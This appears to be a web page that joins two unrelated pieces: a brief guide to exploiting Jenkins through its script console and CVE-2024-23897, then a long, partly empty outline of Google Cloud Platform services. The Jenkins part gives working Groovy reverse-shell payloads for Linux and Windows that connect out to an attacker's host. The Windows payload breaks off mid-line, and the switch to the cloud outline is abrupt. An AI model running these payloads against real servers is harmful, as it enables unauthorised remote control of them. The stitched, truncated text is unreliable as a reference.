Exploiting Jenkins / CVE-2024-23897
Often, due to misconfiguration, the script console is accessible without authentication at http://JENKINS_IP/script
If you don't have access to the script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below).
Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.
For Linux,
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
For Windows,
String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Compute:
1) Compute Engine VM
Compute Engine is Google’s VM service. Users can choose CPUs, memory, persistent disks, and operating systems.
2) Kubernetes
Kubernetes Engine manages groups of virtual servers and applications that run in containers.
Kubernetes is called an orchestration service because it distributes containers across clusters, monitors cluster health, and scales as prescribed by configurations.
3) App Engine
App Engine is Google’s PaaS. Developers can run their code in a language-specific sandbox when using the standard environment or in a container when using the flexible environment.
App Engine is a serverless service, so customers do not need to specify VM configurations or manage servers.
The App Engine standard environment runs applications in language-specific sandboxes and is not a general container management system.
App Engine flexible environments allow you to run containers on the App Engine PaaS.
4) Cloud Functions
Cloud Functions is a serverless service designed to execute short-running code that responds to events, such as file uploads or messages being published to a message queue.
Functions may be written in Node.js or Python.
Storage:
1) Cloud Storage
Object stores are used to store and access file-based resources. These objects are referenced by a unique identifier, such as a URL. Object stores do not provide block or file system services, so they are not suitable for database storage. Cloud Storage is GCP’s object storage service.
2) Persistent Disk
3) Cloud Filestore
File storage supports block-based access to files. Files are organized into directories and subdirectories. Google’s Filestore is based on NFS.
4) Cloud SQL
5) Cloud Bigtable
Google's offering for wide-column databases.
6) Cloud Spanner
Cloud Spanner is a global relational database that provides the advantages of relational databases with the scalability previously found only in NoSQL databases.
7) Cloud Datastore
A NoSQL document database.
8) Cloud Memorystore
A cache service; it is a key-value store.
9) Cloud Firestore
Networking:
1) Virtual Private Cloud
A VPC is a logical isolation of an organization’s cloud resources within a public cloud. In GCP, VPCs are global; they are not restricted to a single zone or region. All traffic between GCP services can be transmitted over the Google network without the need to send traffic over the public Internet.
2) Cloud Load Balancing
Load balancing is the process of distributing a workload across a group of servers. Load balancers can route workload based on network-level or application-level rules. GCP load balancers can distribute workloads globally.
3) Cloud Armor
4) Cloud CDN
5) Cloud Interconnect
a) Interconnects
b) Peering
6) Cloud DNS
7) Identity Management
8) Development Tools
Management Tools:
1) Stackdriver
2) Monitoring
3) Logging
4) Error Reporting
5) Trace
6) Debugger
7) Profiler
Specialized Services:
1) Apigee API Platform
2) Data Analytics
a) BigQuery
b) Cloud Dataproc
c) Cloud Dataflow
d) Cloud Dataprep
3) AI and Machine Learning
a) Cloud AutoML
b) Cloud Machine Learning Engine
c) Cloud Natural Language Processing
d) Cloud Vision
[This article is continuously updated over time]